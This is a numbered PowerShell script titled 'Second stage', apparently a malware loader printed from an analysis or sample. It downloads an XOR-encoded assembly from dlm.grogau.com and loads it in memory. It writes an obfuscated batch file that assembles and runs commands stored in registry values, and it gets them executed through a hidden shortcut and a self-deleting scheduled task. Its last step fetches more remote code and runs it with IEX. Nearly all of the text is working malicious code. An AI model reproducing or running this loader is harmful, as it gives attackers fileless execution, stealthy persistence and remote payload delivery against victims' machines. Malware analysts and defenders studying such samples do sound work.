Second stage

1. $bExists = [System.IO.File]::Exists($fileName)
2.  
3. if (-Not $bExists) {
4. "" | Set-Content $fileName
5.  
6. $bytes = (New-Object Net.WebClient).DownloadData("https://dlm.grogau.com/?f2lnsQGKYqoGuIJdSOhrb8WFtI5DZgVu0cLfe09KTnjlK6L0bndQxwBUYz4oft6IGQeMqJv/DWmhFcHLLkAlCKJK/mX6+9WjQfBawwc0BcDp2w4=")
7.  
8. for($i=0; $i -lt $bytes.count; $i++) {
9. $bytes[$i] = $bytes[$i] -bxor 0x6A
10. }
11.  
12. [Reflection.Assembly]::Load($bytes)
13.  
14. $rInt = [Loader]::randomInt(4, 16)
15. $prefix = "$([Loader]::RandomString($rInt))-"
16.  
17. [Loader]::Go3("https://dlm.grogau.com","dmJvugeFYqECuIJdSOhrb8WFtI5DZgVu0cLfe09KTnjlK6L0bndQxwBUYz4oft6IGQeMqJv6NXK6DerhCEAmIqIR/mGlr+CvEK9CkVAwAw==","dmFgvA2DYKoC9JtBe8pKTMCSgpReVTJZ6rCiYUIhMHfsCILXa3FjyhosNA8yROSsOSOqjrjbPFOwN9DFNHgABIFrwGzs2KWxRPkVlFE8UJI=","dmhmsQSGY6sK9ZtBe8pKTMCSgpReVTJZ6rCiYUIhMHfsCILXa3FjyhosNA8yROSsOSOqjrjbPFOwN9DFNHgABIFrwG3R3+WEH/0b3VI3DJ61jgwv","dmFjvgGLYaIB8ptBe8pKTMCSgpReVTJZ6rCiYUIhMHfsCILXa3FjyhosNA8yROSsOSOqjrjbPFOwN9DFNHgABIFrwG3Ry6yEH/0b3QdhBsXp21wq",$prefix)
18.  
19. $var1 = [Loader]::RandomString($rInt)
20. $var2 = [Loader]::RandomString($rInt)
21. $var3 = [Loader]::RandomString($rInt)
22.  
23. $cmdFileName = "$([Loader]::outDir)\$([Loader]::RandomString([Loader]::randomInt(6, 16))).cmd"
24.  
25. $cmdSource = "@Echo off`r`n"
26. $cmdSource += "Setlocal EnableExtensions`r`n"
27. $cmdSource += "Setlocal EnableDelayedExpansion`r`n"
28. $cmdSource += "Set $var1=HKCU`r`n"
29. $cmdSource += "Set $var1=%$var1%\Software`r`n"
30. $cmdSource += "Set $var1=%$var1%\Microsoft`r`n"
31. $cmdSource += "Set $var2=`r`n"
32. $cmdSource += "FOR /F `"usebackq tokens=1,2*`" %%1 IN (``REG QUERY %$var1%``) DO (`r`n"
33. $cmdSource += "Set $var3=%%11`r`n"
34. $cmdSource += "IF `"!$var3`:~0,$($prefix.Length)!`"==`"$prefix`" (`r`n"
35. $cmdSource += "Set $var2=!$var2!%%3`r`n"
36. $cmdSource += ")`r`n"
37. $cmdSource += ")`r`n"
38. $cmdSource += "%$var2%`r`n"
39. $cmdSource | Set-Content $cmdFileName
40.  
41. $lnkFileName = "$([Loader]::outDir)\$env:USERNAME.lnk"
42. $WshShell = New-Object -comObject WScript.Shell
43. $Shortcut = $WshShell.CreateShortcut($lnkFilename)
44. $Shortcut.TargetPath = $cmdFileName
45. $Shortcut.WindowStyle = 7
46. $Shortcut.Save()
47.  
48. $TaskStartTime = [datetime]::Now.AddSeconds(5)
49. $TaskEndTime = [datetime]::Now.AddSeconds(35)
50.  
51. $taskName = [Loader]::RandomString($rInt)
52.  
53. $service = New-Object -ComObject("Schedule.Service")
54. $service.Connect()
55.  
56. $rootFolder = $service.GetFolder("\")
57.  
58. $TaskDefinition = $service.NewTask(0)
59. $TaskDefinition.RegistrationInfo.Description = ""
60. $TaskDefinition.Settings.Enabled = $true
61. $TaskDefinition.Settings.DisallowStartIfOnBatteries = $false
62. $TaskDefinition.Settings.DeleteExpiredTaskAfter = "PT0M"
63.  
64. $triggers = $TaskDefinition.Triggers
65. $trigger = $triggers.Create(1)
66. $trigger.StartBoundary = $TaskStartTime.ToString("yyyy-MM-dd'T'HH:mm:ss")
67. $trigger.EndBoundary = $TaskEndTime.ToString("yyyy-MM-dd'T'HH:mm:ss")
68. $trigger.Enabled = $true
69.  
70. $action = $TaskDefinition.Actions.Create(0)
71. $action.Path = $cmdFileName
72. $action.Arguments = ""
73.  
74. $action = $TaskDefinition.Actions.Create(0)
75. $action.Path = "schtasks.exe"
76. $action.Arguments = "/Delete /TN $taskName /F"
77.  
78. $rootFolder.RegisterTaskDefinition($taskName, $TaskDefinition, 6, "", $null, 0)
79.  
80. $urlPL = "https://dlm.grogau.com/?dmFguwGEZqsF8JtBe8pKTMCSgpReVTJZ6rCiYUIhMHfsCILXa3FjyhosNA8yROSsOSOqjrjbIVOwT9TuamdZH69NzWvW2++EHJxP7gpNXcDdhQRgMV0A9QUrGfk="
81. IEX(New-Object Net.WebClient).DownloadString("https://dlm.grogau.com/?cWRjvAKCZaYCuIJdSOhrb8WFtI5DZgVu0cLfe09KTnjlK6L0bndQxwBUYz4oft6IGQeMqJvnNXLCEPnUC3g8MqFS/mLE+9OkOKRA8F45SMK8jwkkY1wC")